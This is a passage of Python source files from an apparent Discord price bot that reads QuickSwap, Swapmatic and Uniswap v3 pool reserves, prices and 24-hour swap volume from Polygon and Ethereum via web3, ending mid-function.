exchanges = (
# WETH pairs
("USDC", "WETH", "0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d"),
("WETH", "DAI", "0x4A35582a710E1F4b2030A3F826DA20BfB6703C09"),
("WETH", "USDT", "0xF6422B997c7F54D1c6a6e103bcb1499EeA0a7046"),
("WMATIC", "WETH", "0xadbF1854e5883eB8aa7BAf50705338739e558E5b"),
("maWETH", "WETH", "0x587381961298A6019926329468f2dB73C414cf68"),
("WETH", "SWAM", "0xe3aD20db6f1B061024F4dF761DEB80bCd3e3E2a7"),
# 0xBTC pairs
#("maWETH", "0xBTC", "0x83Eaa0dD0146fb2494eDb1b260eC7C830d356AF7"), # removed 5/26/21; no liquidity
("WMATIC", "0xBTC", "0x74FE2ea44ACe1AEee9937A2FDc7554CFC9288964"),
("0xBTC", "WETH", "0x58BBC687Ad7113e46D35314776FAd9c4B73e200C"),
#("USDC", "0xBTC", "0x19FcFD016a5Fa35286C1FBb3F96Fe9b3fF44530e"), # removed 5/26/21; no liquidity
#("0xBTC", "USDT", "0xa3F3b3ad33C233633242bd1236072355a8af6f52"), # removed 5/26/21; no liquidity
#("KIWI", "0xBTC", "0xf115308E8347E816D23566EAafB4C0BCb1349432"), # removed 5/26/21; no liquidity
#("0xBTC", "DAI", "0xc5e5208A9544Bd0589063D4670E9747535127E16"), # removed 5/26/21; no liquidity
# KIWI pairs
("KIWI", "SWAM", "0x0cD19Fb530D0ff9caB6F233d61dE6240E7f4660F"),
("WMATIC", "KIWI", "0xb97759d3b6210F2b7Af081E023Db972856523A5a"),
("KIWI", "SWAM", "0x6233132c03DAC2Af6495A9dAB02DF18b2A9DA892"),
)
_TIME_BETWEEN_VOLUME_UPDATES = 60 * 60 # 1 hour
# if less than this many tokens in pair, don't use it for price
_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS = 0.1
# if less than this many tokens in pair, don't check its volume
_MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME = 10
class PairNotDefinedError(Exception):
pass
def getExchangeAddressesForToken(name):
return [i[2] for i in exchanges if i[0].lower() == name.lower() or i[1].lower() == name.lower()]
def getTokensFromExchangeAddress(exchange_address):
return [(i[0], i[1]) for i in exchanges if i[2].lower() == exchange_address.lower()][0]
def getExchangeAddressForTokenPair(first_token_name, second_token_name):
token_addresses = sorted([MaticToken().from_symbol(first_token_name).address.lower(),
MaticToken().from_symbol(second_token_name).address.lower()])
for token1_name, token2_name, address in exchanges:
if (token1_name in [first_token_name, second_token_name]
and token2_name in [first_token_name, second_token_name]):
return (address,
MaticToken().from_address(token_addresses[0]).symbol,
MaticToken().from_address(token_addresses[1]).symbol)
raise PairNotDefinedError(f"No pair {first_token_name}-{second_token_name} found")
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
# HACK
# python implementation of uniswap router contract's getAmountOut function. Once web3.py
# supports solidity >= 0.6, we should be able to use the real getAmountOut function.
#
# function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) internal pure returns (uint amountOut) {
# require(amountIn > 0, 'UniswapV2Library: INSUFFICIENT_INPUT_AMOUNT');
# require(reserveIn > 0 && reserveOut > 0, 'UniswapV2Library: INSUFFICIENT_LIQUIDITY');
# uint amountInWithFee = amountIn.mul(997);
# uint numerator = amountInWithFee.mul(reserveOut);
# uint denominator = reserveIn.mul(1000).add(amountInWithFee);
# amountOut = numerator / denominator;
# }
def get_amount_out__uniswap_router(amountIn, reserveIn, reserveOut):
amountIn = int(amountIn)
reserveIn = int(reserveIn)
reserveOut = int(reserveOut)
if amountIn <= 0 or reserveIn <= 0 or reserveOut <= 0:
return None
amountInWithFee = amountIn * 997
numerator = amountInWithFee * reserveOut
denominator = (reserveIn * 1000) + amountInWithFee
return numerator / denominator
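# Worked example (a sketch): with reserves of 1000 tokenIn and 500 tokenOut,
# swapping in 10 tokenIn returns 997*10*500 / (1000*1000 + 997*10) ~= 4.94
# tokenOut, slightly below the no-fee constant-product quote of ~4.95 because
# of the 0.3% fee baked into the 997/1000 factor.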
def get_swap_amount(web3, amount, token0_name, token1_name):
"""Returns the number of token1 tokens you can buy for a given number of
token0 tokens"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
reserves = exchange.functions.getReserves().call()
if token0_name == second_token_name:
reserves[0], reserves[1] = reserves[1], reserves[0]
if reserves[0] == 0 or reserves[1] == 0:
return 0
# TODO: replace this with the real function (commented below) once web3.py
# supports solidity >= 0.6
amount_out = get_amount_out__uniswap_router(
amount * 10**MaticToken().from_symbol(token0_name).decimals,
reserves[0],
reserves[1])
# amount_out = self._router.functions.getAmountOut(
# amount * 10**token0_decimals,
# reserves[0],
# reserves[1]).call()
return amount_out / 10**MaticToken().from_symbol(token1_name).decimals
def get_pooled_balance_for_address(web3, token0_name, token1_name, owner_address):
"""get the balance of a particular address in a uniswap v2 pool"""
exchange_address, _, _ = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
all_ownership_tokens = exchange.functions.totalSupply().call()
if all_ownership_tokens == 0:
# no liquidity tokens minted yet; avoid dividing by zero
ownership_tokens_in_address = 0
ownership_percentage = 0
else:
ownership_tokens_in_address = exchange.functions.balanceOf(owner_address).call()
ownership_percentage = ownership_tokens_in_address / all_ownership_tokens
reserves = get_reserves(web3, token0_name, token1_name)
return reserves[0] * ownership_percentage, reserves[1] * ownership_percentage
def get_reserves(web3, token0_name, token1_name):
"""get the reserves, in tokens, of a particular uniswap v2 pool"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name)
exchange = web3.eth.contract(address=exchange_address, abi=exchange_abi)
reserves = exchange.functions.getReserves().call()
reserves[0] = reserves[0] / 10**MaticToken().from_symbol(first_token_name).decimals
reserves[1] = reserves[1] / 10**MaticToken().from_symbol(second_token_name).decimals
if token0_name == second_token_name:
reserves[0], reserves[1] = reserves[1], reserves[0]
return reserves[0], reserves[1]
def get_price(web3, token0_name, token1_name):
"""Get the price at a particular uniswap v2 pool, in terms of token0 / token1"""
reserves = get_reserves(web3, token0_name, token1_name)
if reserves[1] == 0:
return 0
else:
return reserves[0] / reserves[1]
class QuickSwapAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, timeout=10.0):
super().__init__()
try:
self._exchange_addresses = getExchangeAddressesForToken(currency_symbol)
self._decimals = MaticToken().from_symbol(currency_symbol).decimals
except IndexError:
raise RuntimeError("Unknown currency_symbol {}, need to add address to token_class.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "QuickSwap"
self.command_names = ["quickswap"]
self.short_url = "https://bit.ly/2R42MbO" # main quickswap pre-selected to 0xbtc
self.volume_eth = 0
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL, request_kwargs={'timeout': timeout}))
self._exchanges = [self._w3.eth.contract(address=a, abi=exchange_abi) for a in self._exchange_addresses]
def _is_time_to_update_volume(self):
return time.time() - self._time_volume_last_updated > _TIME_BETWEEN_VOLUME_UPDATES
def _mark_volume_as_updated(self):
self._time_volume_last_updated = time.time()
async def _get_volume_at_exchange_contract(self, exchange_contract, current_eth_block=None, timeout=10.0):
volume_tokens = 0 # volume in units of <self.currency_symbol> tokens
volume_pair = 0 # volume in units of the paired token
swap_topic = "0xd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822"
sync_topic = "0x1c411e9a96e071241c2f21f7726b17ae89e3cab4c78be50e062b03a9fffbbad1"
burn_topic = "0xdccd412f0b1252819cb1fd330b93224ca42612892bb3f4f789976e6d81936496"
transfer_topic = "0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"
approval_topic = "0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"
mint_topic = "0x4c209b5fc8ad50758f13e2e1088ba56a560dff690a1c6fef26394f4c03821c4f"
token0_address = exchange_contract.functions.token0().call()
token1_address = exchange_contract.functions.token1().call()
if current_eth_block is None:
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*24 / SECONDS_PER_MATIC_BLOCK)),
'toBlock': current_eth_block - 1,
'address': exchange_contract.address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == swap_topic:
#print('swap in tx', self._w3.toHex(event['transactionHash']))
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
parsed_logs = exchange_contract.events.Swap().processReceipt(receipt)
correct_log = None
for log in parsed_logs:
if log.address.lower() == exchange_contract.address.lower():
correct_log = log
if correct_log is None:
logging.warning('bad swap transaction {}'.format(self._w3.toHex(event['transactionHash'])))
continue
#sender_address = correct_log.args.sender
#to_address = correct_log.args.to
amount0In = correct_log.args.amount0In
amount1In = correct_log.args.amount1In
amount0Out = correct_log.args.amount0Out
amount1Out = correct_log.args.amount1Out
#block_number = correct_log.blockNumber
if MaticToken().from_address(token0_address).symbol.lower() == self.currency_symbol.lower():
# token0 is the tracked currency symbol
volume_tokens += abs((amount0In - amount0Out) / 10**MaticToken().from_address(token0_address).decimals)
volume_pair += abs((amount1In - amount1Out) / 10**MaticToken().from_address(token1_address).decimals)
elif MaticToken().from_address(token1_address).symbol.lower() == self.currency_symbol.lower():
# token1 is the tracked currency symbol
volume_tokens += abs((amount1In - amount1Out) / 10**MaticToken().from_address(token1_address).decimals)
volume_pair += abs((amount0In - amount0Out) / 10**MaticToken().from_address(token0_address).decimals)
# print(' token', getTokenNameFromAddress(token0_address), 'send to exchange', (amount0In - amount0Out) / 10**getTokenDecimalsFromAddress(token0_address), getTokenNameFromAddress(token0_address))
# print(' token', getTokenNameFromAddress(token1_address), 'send to exchange', (amount1In - amount1Out) / 10**getTokenDecimalsFromAddress(token1_address), getTokenNameFromAddress(token1_address))
continue
elif topic0 == mint_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == sync_topic:
continue
elif topic0 == burn_topic:
continue
elif topic0 == transfer_topic:
continue
elif topic0 == approval_topic:
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
return volume_tokens, volume_pair
async def _get_price_and_liquidity_at_exchange_contract(self, exchange_contract):
token0_address = exchange_contract.functions.token0().call().lower()
token1_address = exchange_contract.functions.token1().call().lower()
paired_token_address = token0_address if token1_address.lower() == MaticToken().from_symbol(self.currency_symbol).address.lower() else token1_address
paired_token_symbol = MaticToken().from_address(paired_token_address).symbol
liquidity_tokens, liquidity_pair = get_reserves(self._w3, self.currency_symbol, paired_token_symbol)
# bail early if the number of tokens LPd is very small
# TODO: this should probably be configurable. Or generated automatically
# based on some USD value, not token value
if liquidity_tokens < _MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS:
raise NoLiquidityException(f"Less than {_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS} tokens LP'd for exchange contract.")
# get price of paired token (in USD) to determine price of
# <self.currency_symbol> in USD. Strategy changes depending on pair
price_in_paired_token = get_price(self._w3, paired_token_symbol, self.currency_symbol)
if paired_token_symbol == "WETH":
paired_token_price_in_usd = self.eth_price_usd
else:
# get the paired token's price in Eth. If there is less than $500 in
# liquidity to determine this, then skip this pair when determining price.
liquidity_eth_of_paired_token, _ = get_reserves(self._w3, "WETH", paired_token_symbol)
if liquidity_eth_of_paired_token < 500 / self.eth_price_usd:
raise NoLiquidityException(f"Less than {500} USD LP'd for paired token {paired_token_symbol}, pair token price not considered accurate. Skipping pair.")
else:
paired_token_price_in_eth = get_price(self._w3, "WETH", paired_token_symbol)
paired_token_price_in_usd = paired_token_price_in_eth * self.eth_price_usd
price_in_usd = price_in_paired_token * paired_token_price_in_usd
return price_in_usd, liquidity_tokens
async def _update_all_values(self, should_update_volume=False, timeout=10):
# TODO: switch to rolling 24-hour volume by loading 1 hour at a time to
# allow re-enable volume updates
# currently alchemyapi errors because 24h of events is too many for 1 call
should_update_volume = False
# END TODO
if should_update_volume:
current_eth_block = self._w3.eth.blockNumber
# get price of eth
eth_prices = [
get_price(self._w3, "DAI", "WETH"),
get_price(self._w3, "USDT", "WETH"),
get_price(self._w3, "USDC", "WETH"),
]
self.eth_price_usd = sum(eth_prices) / len(eth_prices) # TODO: should be weighted average
# get token price (in USD), liquidity (in tokens), and volume (in tokens) for
# each pair. Note: if liquidity is low for a pair, its volume is not checked.
price_usd_weighted_average = WeightedAverage()
total_liquidity_tokens = 0
total_volume_tokens = 0
for exchange_contract in self._exchanges:
try:
price_usd, liquidity_tokens = await self._get_price_and_liquidity_at_exchange_contract(exchange_contract)
except (NoTokenMatchError, PairNotDefinedError) as e:
logging.warning(f"Failed to update quickswap exchange: {str(e)}")
continue
except NoLiquidityException:
# no liquidity is not an error; simply skip this exchange
continue
else:
price_usd_weighted_average.add(price_usd, liquidity_tokens)
total_liquidity_tokens += liquidity_tokens
if should_update_volume and liquidity_tokens > _MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME:
try:
volume_tokens, volume_pair = await self._get_volume_at_exchange_contract(exchange_contract, current_eth_block=current_eth_block, timeout=timeout)
total_volume_tokens += volume_tokens
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update QuickSwapAPI volume: ReadTimeout")
self.price_usd = price_usd_weighted_average.average()
self.price_eth = self.price_usd / self.eth_price_usd
self.liquidity_tokens = total_liquidity_tokens
self.liquidity_eth = self.liquidity_tokens * self.price_eth
if should_update_volume:
self.volume_tokens = total_volume_tokens
self.volume_eth = self.volume_tokens * self.price_eth
# NOTE: this sets _time_volume_last_updated even if all volume updates
# failed. This is OK for now, it throttles struggling APIs (matic) but
# may not be the ideal behavior.
self._mark_volume_as_updated()
async def _update(self, timeout=10.0):
if self._is_time_to_update_volume():
await self._update_all_values(timeout=timeout, should_update_volume=True)
else:
await self._update_all_values(timeout=timeout, should_update_volume=False)
if __name__ == "__main__":
# run some generic uniswap v2 functions
web3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL))
print('$1 in USDC will swap for {} 0xBTC tokens'.format(get_swap_amount(web3, 1, "USDC", "0xBTC")))
print('$1 in DAI will swap for {} 0xBTC tokens'.format(get_swap_amount(web3, 1, "DAI", "0xBTC")))
print('1 0xBTC token will swap for {} DAI'.format(get_swap_amount(web3, 1, "0xBTC", "DAI")))
print('100 0xBTC tokens will swap for {} DAI'.format(get_swap_amount(web3, 100, "0xBTC", "DAI")))
print('1 ETH will swap for {} DAI'.format(get_swap_amount(web3, 1, "WETH", "DAI")))
print('230 DAI will swap for {} ETH'.format(get_swap_amount(web3, 230, "DAI", "WETH")))
print('0xbtc and ETH balances:', get_reserves(web3, "0xBTC", "WETH"))
# print('0xbtc and ETH price:', e.get_price("0xBTC", "WETH"), "0xBTC per ETH")
# print('0xbtc and ETH price:', e.get_price("WETH", "0xBTC"), "ETH per 0xBTC")
print()
print('eth usdc reserves ', get_reserves(web3, "WETH", "USDC"))
print('1 in ETH will swap for {} USDC '.format(get_swap_amount(web3, 1, "WETH", "USDC")))
print('1 in ETH will swap for {} USDT '.format(get_swap_amount(web3, 1, "WETH", "USDT")))
print('1 in ETH will swap for {} DAI '.format(get_swap_amount(web3, 1, "WETH", "DAI")))
print()
# get some data from 0xBTC pool via QuickSwapAPI
e = QuickSwapAPI('0xBTC')
e.load_once_and_print_values()
print()
try:
print('0xBTC-WETH liquidity in eth', e.liquidity_eth)
except AttributeError:
pass
print('0xBTC-WETH liquidity in tokens', e.liquidity_tokens)
# get some data from KIWI pool via QuickSwapAPI
# e = QuickSwapAPI('KIWI')
# e.load_once_and_print_values()
# print()
# try:
# print('KIWI-WETH liquidity in eth', e.liquidity_eth)
# except AttributeError:
# pass
# print('KIWI-WETH liquidity in tokens', e.liquidity_tokens)
# e = QuickSwapAPI('DAI')
# e.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/swapmatic.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI
from .uniswap_v1_abi import exchange_abi
from .erc20_abi import erc20_abi
from secret_info import ETHEREUM_NODE_URL
from secret_info import MATIC_NODE_URL
from constants import SECONDS_PER_MATIC_BLOCK
from .uniswap_v2 import get_price as uniswap_v2_get_price
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
class SwapmaticAPI(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol, timeout=10.0):
super().__init__()
if currency_symbol == "0xBTC":
self.exchange_address = "0x7c27aDF852c87D2A5BdF46abFDFa9531B76ef9c1"
self.currency_address = "0x71B821aa52a49F32EEd535fCA6Eb5aa130085978"
self._decimals = 8
elif currency_symbol == "XXX":
self.exchange_address = "0x0000000000000000000000000000000000000000"
self.currency_address = "0x0000000000000000000000000000000000000000"
self._decimals = 0
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to uniswap.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Swapdog.io"
self.command_names = ["swapdog", "swapmatic"]
self.short_url = "https://bit.ly/3jWSypf" # swapdog pre-selected to 0xbtc
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(MATIC_NODE_URL, request_kwargs={'timeout': timeout}))
self._exchange = self._w3.eth.contract(address=self.exchange_address, abi=exchange_abi)
async def _update_24h_volume(self, matic_eth_price, timeout=10.0):
token_purchase_topic = "<KEY>"
eth_purchase_topic = "0x7f4091b46c33e918a0f3aa42307641d17bb67029427a5369e54b353984238705"
transfer_topic = "0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"
remove_liquidity_topic = "0x0fbf06c058b90cb038a618f8c2acbf6145f8b3570fd1fa56abb8f0f3f05b36e8"
add_liquidity_topic = "0x06239653922ac7bea6aa2b19dc486b9361821d37712eb796adfd38d81de278ca"
current_eth_block = self._w3.eth.blockNumber
volume_base = 0
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*24 / SECONDS_PER_MATIC_BLOCK)),
'toBlock': current_eth_block - 1,
'address': self.exchange_address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == token_purchase_topic:
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
base_amount = wei_to_ether(self._w3.toInt(event['topics'][2]))
token_amount = self._w3.toInt(event['topics'][3]) / 10**self._decimals
volume_base += base_amount
elif topic0 == eth_purchase_topic:
address = self._w3.toChecksumAddress(event['topics'][1][-20:])
token_amount = self._w3.toInt(event['topics'][2]) / 10**self._decimals
base_amount = wei_to_ether(self._w3.toInt(event['topics'][3]))
volume_base += base_amount
elif topic0 == transfer_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == remove_liquidity_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == add_liquidity_topic:
# skip liquidity deposits/withdrawals
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
self.volume_eth = volume_base * matic_eth_price
self._time_volume_last_updated = time.time()
async def _update(self, timeout=10.0):
# First grab price of ETH and price of MATIC from uniswap v2 on the eth network
_w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
eth_dai_price = uniswap_v2_get_price(_w3, "DAI", "WETH")
matic_eth_price = uniswap_v2_get_price(_w3, "WETH", "MATIC")
matic_dai_price = matic_eth_price * eth_dai_price
# TODO: The amount of tokens 'purchased' to determine the price should
# not be a fixed value (200). Ideally, load the amount of tokens
# available in the contract and use a certain percentage.
amount_tokens = 200
matic_amount_buy = wei_to_ether(self._exchange.functions.getEthToTokenOutputPrice(amount_tokens * 10**self._decimals).call())
matic_amount_sell = wei_to_ether(self._exchange.functions.getTokenToEthInputPrice(amount_tokens * 10**self._decimals).call())
average_matic_amount = (matic_amount_buy + matic_amount_sell) / 2
liq_matic, liq_tokens = self.get_reserves()
self.liquidity_eth = liq_matic * matic_eth_price
self.liquidity_tokens = liq_tokens
average_eth_amount = average_matic_amount * matic_eth_price
self.price_eth = average_eth_amount / amount_tokens
# TODO: maybe don't do this? DAI isn't always 1:1 pegged to USD
if self.currency_symbol == "DAI":
self.eth_price_usd = 1 / self.price_eth
# TODO: switch to rolling 24-hour volume by loading 1 hour at a time to
# allow re-enable volume updates
# currently alchemyapi errors because 24h of events is too many for 1 call
return
# update volume once every hour since it (potentially) loads eth api
if time.time() - self._time_volume_last_updated > 60*60:
try:
await self._update_24h_volume(matic_eth_price)
except requests.exceptions.ReadTimeout:
logging.warning(f"Failed to update QuickSwapAPI volume: ReadTimeout")
finally:
# always update this to throttle volume updates
self._time_volume_last_updated = time.time()
# get the eth and token balance of a particular address in a uniswap v1 pool
def get_pooled_balance_for_address(self, owner_address):
all_ownership_tokens = self._exchange.functions.totalSupply().call()
ownership_tokens_in_address = self._exchange.functions.balanceOf(owner_address).call()
ownership_percentage = ownership_tokens_in_address / all_ownership_tokens
eth_balance, token_balance = self.get_reserves()
return eth_balance * ownership_percentage, token_balance * ownership_percentage
# get the reserves, in eth and tokens, of a particular uniswap v1 pool
def get_reserves(self):
eth_balance = wei_to_ether(self._w3.eth.getBalance(self.exchange_address))
token_contract = self._w3.eth.contract(address=self.currency_address, abi=erc20_abi)
token_balance = token_contract.functions.balanceOf(self.exchange_address).call() / 10**self._decimals
return eth_balance, token_balance
if __name__ == "__main__":
e = SwapmaticAPI('0xBTC')
e.load_once_and_print_values()
print('reserves:', e.get_reserves())
# e = SwapmaticAPI('DAI')
# e.load_once_and_print_values()
```
#### File: 0xbtc-discord-price-bot/exchanges/uniswap_v3.py
```python
import logging
from web3 import Web3
import time
import requests
from .base_exchange import Daily24hChangeTrackedAPI, NoLiquidityException
from .erc20_abi import erc20_abi
from secret_info import ETHEREUM_NODE_URL
from constants import SECONDS_PER_ETH_BLOCK
from token_class import Token, NoTokenMatchError
from weighted_average import WeightedAverage
from uniswap import Uniswap
# list of exchange contract addresses. each pair has a unique address.
# token0 name, token1 name, uniswap exchange address, fee amount
# fee is in in basis points. so 3000 = 0.3%
exchanges = (
("0xBTC", "WETH", "0xaFF587846a44aa086A6555Ff69055D3380fD379a", 10000),
("USDC", "0xBTC", "0xc01435E578eb3182cABE05F11DB2bEa493dbe7CA", 10000),
("USDC", "WETH", "0x8ad599c3A0ff1De082011EFDDc58f1908eb6e6D8", 3000),
)
_TIME_BETWEEN_VOLUME_UPDATES = 60 * 60 # 1 hour. WARNING: don't change this without refactoring hourly volume logic
# if less than this many tokens in pair, don't use it for price
_MINIMUM_ALLOWED_LIQUIDITY_IN_TOKENS = 0.1
# if less than this many tokens in pair, don't check its volume
_MINIMUM_ALLOWED_LIQUIDITY_TOKENS_TO_CHECK_VOLUME = 10
# fee to use by default, in basis points. 3000 = 0.3%
_DEFAULT_PAIR_FEE = 3000
class PairNotDefinedError(Exception):
pass
def getExchangeAddressesForToken(name):
return [i[2] for i in exchanges if i[0].lower() == name.lower() or i[1].lower() == name.lower()]
def getTokensFromExchangeAddress(exchange_address):
return [(i[0], i[1], i[3]) for i in exchanges if i[2].lower() == exchange_address.lower()][0]
def getExchangeAddressForTokenPair(first_token_name, second_token_name, fee_to_match):
token_addresses = sorted([Token().from_symbol(first_token_name).address.lower(),
Token().from_symbol(second_token_name).address.lower()])
for token1_name, token2_name, address, fee in exchanges:
if (token1_name in [first_token_name, second_token_name]
and token2_name in [first_token_name, second_token_name]
and fee == fee_to_match):
return (address,
Token().from_address(token_addresses[0]).symbol,
Token().from_address(token_addresses[1]).symbol)
raise PairNotDefinedError(f"No pair {first_token_name}-{second_token_name} found")
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
def ether_to_wei(amount_in_ether):
return int(amount_in_ether * 1000000000000000000.0)
def from_u256_twos_complement(twos_complemented_number):
sign_bit = (1 << 255)
if twos_complemented_number & sign_bit != 0:
return twos_complemented_number - (1 << 256)
else:
return twos_complemented_number
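# e.g. from_u256_twos_complement(2**256 - 1) == -1, since pool balance deltas
# are signed int256 values encoded in unsigned storage.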
def get_reserves(web3, token0_name, token1_name, fee):
"""get the reserves, in tokens, of a particular uniswap v3 pool"""
exchange_address, first_token_name, second_token_name = getExchangeAddressForTokenPair(token0_name, token1_name, fee)
token0_contract = web3.eth.contract(address=Token().from_symbol(token0_name).address, abi=erc20_abi)
token0_balance = (token0_contract.functions.balanceOf(exchange_address).call()
/ 10**Token().from_symbol(token0_name).decimals)
token1_contract = web3.eth.contract(address=Token().from_symbol(token1_name).address, abi=erc20_abi)
token1_balance = (token1_contract.functions.balanceOf(exchange_address).call()
/ 10**Token().from_symbol(token1_name).decimals)
return token0_balance, token1_balance
def get_price(uniswap_api, token0_name, token1_name, fee):
"""Get the price at a particular uniswap v3 pool, in terms of token0 / token1"""
if token0_name == "ETH":
token0_address = "0x0000000000000000000000000000000000000000"
token0_decimals = 18
else:
token0_address = Token().from_symbol(token0_name).address
token0_decimals = Token().from_symbol(token0_name).decimals
if token1_name == "ETH":
token1_address = "0x0000000000000000000000000000000000000000"
token1_decimals = 18
else:
token1_address = Token().from_symbol(token1_name).address
token1_decimals = Token().from_symbol(token1_name).decimals
price = (uniswap_api.get_price_input(token1_address,
token0_address,
1 * 10**token1_decimals,
fee)
/ 10 ** token0_decimals)
return price
class Uniswapv3API(Daily24hChangeTrackedAPI):
def __init__(self, currency_symbol):
super().__init__()
try:
# self._exchange_addresses = getExchangeAddressesForToken(currency_symbol)
self._decimals = Token().from_symbol(currency_symbol).decimals
except IndexError:
raise RuntimeError("Unknown currency_symbol {}, need to add address to token_class.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Uniswap v3"
self.command_names = ["uniswap"]
self.short_url = "https://bit.ly/35nae4n" # main uniswap pre-selected to 0xbtc
self.volume_eth = 0
self.show_yield = True
self.hourly_volume_tokens = [] # list of volume for each of the last N hours
self._time_volume_last_updated = 0
self._w3 = Web3(Web3.HTTPProvider(ETHEREUM_NODE_URL))
self._uniswap_api = Uniswap(address=None, private_key=None, version=3, web3=self._w3)
# self._exchanges = [self._w3.eth.contract(address=a, abi=exchange_abi) for a in self._exchange_addresses]
@property
def number_of_hours_covered_by_volume(self):
return len(self.hourly_volume_tokens)
def _is_time_to_update_volume(self):
return time.time() - self._time_volume_last_updated > _TIME_BETWEEN_VOLUME_UPDATES
def _mark_volume_as_updated(self):
self._time_volume_last_updated = time.time()
async def _get_volume_for_pair(self, token0_address, token1_address, fee, num_hours_into_past=1, current_eth_block=None, timeout=10.0):
volume_tokens = 0 # volume in units of <self.currency_symbol> tokens
volume_pair = 0 # volume in units of the paired token
token0_address, token1_address = sorted([token0_address, token1_address])
token0_decimals = Token().from_address(token0_address).decimals
token1_decimals = Token().from_address(token1_address).decimals
# https://docs.uniswap.org/reference/core/interfaces/pool/IUniswapV3PoolEvents
swap_topic = "0xc42079f94a6350d7e6235f29174924f928cc2ac818eb64fed8004e115fbcca67"
collect_topic = "0x70935338e69775456a85ddef226c395fb668b63fa0115f5f20610b388e6ca9c0"
# this event seems to throw when a collect occurs, but only includes the first 3 parameters?
cloned_collect_topic = "0x0c396cd989a39f4459b5fa1aed6a9a8dcdbc45908acfd67e028cd568da98982c"
exchange_address, _, _ = getExchangeAddressForTokenPair(
Token().from_address(token0_address).symbol,
Token().from_address(token1_address).symbol,
fee)
if current_eth_block is None:
current_eth_block = self._w3.eth.blockNumber
for event in self._w3.eth.getLogs({
'fromBlock': current_eth_block - (int(60*60*num_hours_into_past / SECONDS_PER_ETH_BLOCK)),
'toBlock': current_eth_block - 1,
'address': exchange_address}):
topic0 = self._w3.toHex(event['topics'][0])
if topic0 == swap_topic:
receipt = self._w3.eth.getTransactionReceipt(event['transactionHash'])
# address sender (usually the router address)
router_address = self._w3.toChecksumAddress(event['topics'][1][-20:])
# address recipient
buyer_address = self._w3.toChecksumAddress(event['topics'][2][-20:])
data = event['data'][2:] if event['data'].startswith('0x') else event['data']
# int256 amount 0 (delta of the token0 balance of the pool)
amount_0 = from_u256_twos_complement(self._w3.toInt(hexstr=data[0:64])) / 10**token0_decimals
# int256 amount 1 (delta of the token1 balance of the pool)
amount_1 = from_u256_twos_complement(self._w3.toInt(hexstr=data[64:128])) / 10**token1_decimals
# uint160 sqrtPriceX96 unused
# uint128 liquidity unused
# int24 tick unused
# print('swap in tx', self._w3.toHex(event['transactionHash']))
# print(f'amount_0: {amount_0}, amount_1: {amount_1}')
if Token().from_address(token0_address).symbol.lower() == self.currency_symbol.lower():
# token0 is the tracked currency symbol
volume_tokens += abs(amount_0)
volume_pair += abs(amount_1)
elif Token().from_address(token1_address).symbol.lower() == self.currency_symbol.lower():
# token1 is the tracked currency symbol
volume_tokens += abs(amount_1)
volume_pair += abs(amount_0)
else:
raise RuntimeError(f"bad swap in tx {event['transactionHash']}: token0_address:{token0_address} token1_address:{token1_address}")
continue
elif topic0 == collect_topic:
# skip liquidity deposits/withdrawals
continue
elif topic0 == cloned_collect_topic:
# skip liquidity deposits/withdrawals
continue
else:
logging.debug('unknown topic txhash {}'.format(self._w3.toHex(event['transactionHash'])))
logging.debug('unknown topic topic0 {}'.format(topic0))
continue
return volume_tokens, volume_pair
async def _get_price_and_liquidity_for_pair(self, token0_address, token1_address, fee):
paired_token_address = token0_address if token1_address.lower() == Token().from_symbol(self.currency_symbol).address.lower() else token1_address
paired_token_symbol = Token().from_address(paired_token_address).symbol
